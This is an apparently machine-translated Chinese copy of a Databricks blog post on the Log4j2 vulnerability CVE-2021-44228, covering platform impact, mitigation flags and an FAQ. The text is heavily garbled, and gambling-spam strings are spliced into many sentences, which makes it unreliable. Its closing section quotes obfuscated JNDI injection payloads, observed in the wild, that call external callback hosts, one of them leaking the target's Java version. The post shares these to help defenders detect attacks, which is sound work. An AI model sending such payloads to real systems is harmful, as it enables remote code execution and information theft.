Log4j2脆弱性(cve - 2021 - 44228)的研究和評估

通過佛明j . Serna

2021年12月23日在工程的博客

分享這篇文章

這個博客與一個正在進行的調查。我們將更新它,任何重要的更新,包括檢測規則來幫助人們調查由於潛在風險cve - 2021 - 44228在自己的使用磚和其他地方。應該我們的調查得出結論,客戶可能已經受到影響,我們將單獨通知通過電子郵件這些客beplay体育app下载地址戶主動。

更新12.23.2021 2055 PST。

如你所知,已經有了0-day發現Log4j2, Java日誌庫,可能導致遠程代碼執行(遠端控製設備)如果受影響的log4j版本(2.0 2.15.0)日誌attacker-controlled字符串值沒有適當的驗證。請參閱更多細節cve - 2021 - 44228。

我們目前認為磚平台不受影響。Beplay体育安卓版本磚不直接使用log4j版本已知漏洞的影響在磚平台在某種程度上我們理解可能容易受到這種CVE(例如,記錄用戶控製字符串)。Beplay体育安卓版本我們調查了多個場景包括傳遞使用log4j和類路徑進口秩序,沒有發現任何證據磚脆弱到目前為止使用的平台。Beplay体育安卓版本

雖然我們不直接使用log4j的影響版本,磚有豐富的謹慎的磚平台內實現防禦措施來減輕潛在的接觸這個漏洞,包括通過允許JVM緩解(log4j2.formatMsgNoLookups = true)磚控製飛機。Beplay体育安卓版本這防止潛在脆弱性從任何傳遞依賴一個版本可能存在的影響,無論是現在還是未來。

潛在問題與客戶代碼

雖然我們不相信磚平台本身的影響,如果您正在使用log4j磚dataplane集Beplay体育安卓版本群內(例如,如果你是處理用戶控製字符串通過log4j),你的使用可能是潛在的易受攻擊如果你有安裝和使用一個影響版本或安裝服務,也取決於一個影響版本。

請注意,磚平台也是部分免受潛在的利用數據平麵內,即使我們的客戶利Beplay体育安卓版本用log4j的脆弱的版本在不使用自己的代碼作為平台版本的jdk,特別是關於潛在的利用(beplay体育app下载地址

(更新02.04.22)
辛巴已經發布了一個更新的版本(2.6.22)辛巴的JDBC驅動程序使用Log4j 2.17.1可用。請查看JDBC驅動程序下載頁麵下載和使用2.6.22辛巴JDBC驅動程序。

指的是發布說明確認。

請注意,如果您使用的是辛巴JDBC驅動程序的一個版本的2.6.21之前,它有一個依賴的一個版本log4j2是受此影響的脆弱性。是你的責任來驗證是否使用這個驅動程序影響的脆弱性和更新。

建議緩解措施

然而,在大量的謹慎,您可能希望重新配置任何集群安裝了一個版本的log4j(> = 2.0和影響

更新log4j2.16 +;和/或

log4j2.10 -2.15.0重新配置的集群已知的暫時緩解(log4j2實現。formatMsgNoLookups設置為true)並重新啟動集群

(更新12.15.21)
最初的博客發布以來,進一步的信息在log4j 2.15。x光。我們建議客戶依賴這個庫升級到2.1beplay体育app下载地址6 +。

的步驟減少2.10 -2.15.0是:

編輯的火花conf”spark.driver集群和工作。extraJavaOptions”和“spark.executor。extraJavaOptions”設置為“-Dlog4j2.formatMsgNoLookups = true”

確認編輯重新啟動集群,或者隻是引發新工作運行將使用更新的java選項。

你可以確認這些設置生效的“火花UI”選項卡,在“環境”

請注意,因為我們不控製您通過我們的平台上運行的代碼,我們不能確認migitations將滿足你的用例。Beplay体育安卓版本

常見問題(FAQ)

(更新12.17.21)
我如何更新用戶安裝log4j2圖書館2.16 + ?
請參考磚KB文章獲取詳細信息。

更新的時間表依賴性Log4j2 2.16 +版本嗎?
雖然我們現在相信磚平台並不影響,磚將更新庫,可以使用log4j軌跡的影響版本第三方補Beplay体育安卓版本丁sla和根據我們的標準運行時支持生命周期。請注意,版本標記為年底的DBR的支持將沒有任何補丁的補丁。請跟這個博客的更新。

有什麼缺點增加JVM旗幟作為防範措施?
我們相信,設置這個標誌應該減輕脆弱性,並測試它在我們的係統。然而,正如我們的博客上麵,因為磚不控製代碼你可以通過我們的服務過程中,我們不能確定是否一個特定的緩解。我們建議您執行測試自己是否緩解集群內是充分的從你的角度看。我們鼓勵您重啟後測試集群上。

磚容易受到cve - 2021 - 45046在Log4j 2.15補丁?
磚不相信我們以任何方式使用log4j容易cve - 2021 - 45046。beplay体育app下载地址客戶應該更新2.16 +如果他們的安裝和使用log4j2集群。磚的過程中考慮是否更新到2.16 +這個漏洞無關的原因。我們目前沒有一個埃塔可能這樣做。

磚可能不是脆弱的Log4j 2 CVE,但是磚使用Log4j 1。x,是使用容易受到任何出版為Log4j 1. x cf嗎?
磚有限使用Log4j 1。x在我們的服務。我們不認為磚使用Log4j 1。x cf發表的任何影響。磚是評估一個更新Log4j 2.16或以上的原因與此漏洞無關。我們目前沒有一個埃塔可能這樣做。

然而,如果你的代碼使用一個Log4j 1的影響。x類(JMSAppender或SocketServer),你使用這些漏洞可能潛在影響。如果你需要這些類,你應該更新你的代碼依賴於Log4j 2.16或以上。

如果你不能更新Log4j 2.16或以上您可以實現全球init腳本,旨在剝奪這些類的Log4j 1。在集群啟動x。請檢查這個KB文章獲取詳細信息。

注意:如果您的代碼依賴於這些類,這將是一個打破的變化。因為我們不控製運行的代碼,我們不能保證這個解決方案將防止Log4j加載類在所有情況下的影響。集群內你應該運行測試(例如,通過試圖導入筆記本中受影響的類),確保受影響的類是不可到達的。

更新(12/20/21):我們執行的掃描版本的log4j2磚VM映像和發現的脆弱。x。他們是脆弱的嗎?
磚有守護進程運行在dataplane使用log4j版本的漏洞報告。磚已經徹底分析我們使用log4j這些守護進程,我們不相信這些守護進程使用log4j是可利用的任何已知的漏洞。

磚個子處理器Log4j脆弱性的影響嗎?
磚正積極與有關sub-processors和服務提供者是否可能有任何影響。如果我們確定任何客戶數據可能會影響結果的使用影響的subprocessor庫,您將得到通知,按照我們的協議。

潛在的企圖利用信號

作為調查的一部分,我們繼續深入分析交通在我們的平台上。Beplay体育安卓版本到目前為止,我們還沒有找到任何證據成功利用此漏洞的攻擊磚平台本身或客戶的使用平台。beplay体育app下载地址Beplay体育安卓版本

然而,我們發現了一個數量的信號,我們認為可能是重要的安全社區:感興趣

在最初的幾個小時後這個漏洞變得廣為人知,自動掃描儀開始在互聯網利用簡單的回調函數來識別潛在的目標。雖然絕大多數的掃描使用LDAP協議用於最初的概念,我們看到了回調的嚐試利用以下協議:

HTTP
DNS
LDAP通過SSL (LDAP)
RMI
IIOP

此外,我們已經看到攻擊者試圖混淆他們的活動,以避免預防或嵌套的檢測信息查詢。下麵的示例(來自一個操縱UserAgent字段)將繞過簡單過濾器/搜索“jndi: ldap”:

$ {jndi: ${低:l} ${低:d}{低:p}:美元/ / world80.log4j.bin ${上:}ryedge.io: 80 /回調}

這個困惑不限於方法,如信息查找可以深層嵌套的。作為一個例子,這個非常奇異的調查試圖瘋狂混淆JNDI查找:

$ {j $ {KPW: MnVQG: hARxLh: - n} d $ {cMrwww: aMHlp: LlsJc: Hvltz: OWeka:我}:{jgF: IvdW: hBxXUS: - l}美元d $ {IGtAj: KgGmt: mfEa:——} p: / /1639227068302CJEDj.kfvg5l.dnslog.cn/249540}

即使沒有成功的遠程代碼執行,攻擊者可以獲得有價值的洞察目標環境的狀態,信息查找可以泄漏環境變量和其他係統的信息。這個例子試圖列舉目標係統上的java版本:

$ {jndi: ${低:l} ${低:d} ${低:}${低:p}: / / $ {sys: java.version} .xxx.yyy.www.eheci.com.as3z18.dnslog.cn}

現代Java運行時(包括磚內的版本使用平台,包括限製,廣泛利用這個漏洞更加困難。Beplay体育安卓版本然而,隨著Veracode研究博客”中提到的利用JNDI注射用Java”,攻擊者可以利用某些已經存在的對象工廠在當地的類路徑來觸發這個和類似的漏洞。嚐試加載遠程類使用一個工具鏈不存在於目標和一個警告可能產生Java堆棧跟蹤嗎包含“錯誤查找JNDI資源(ldap: / / xxx.yyy.yyy.zzz:港口/類)”。這是在尋找超越標準調掃描可能表明一個更複雜的開發嚐試。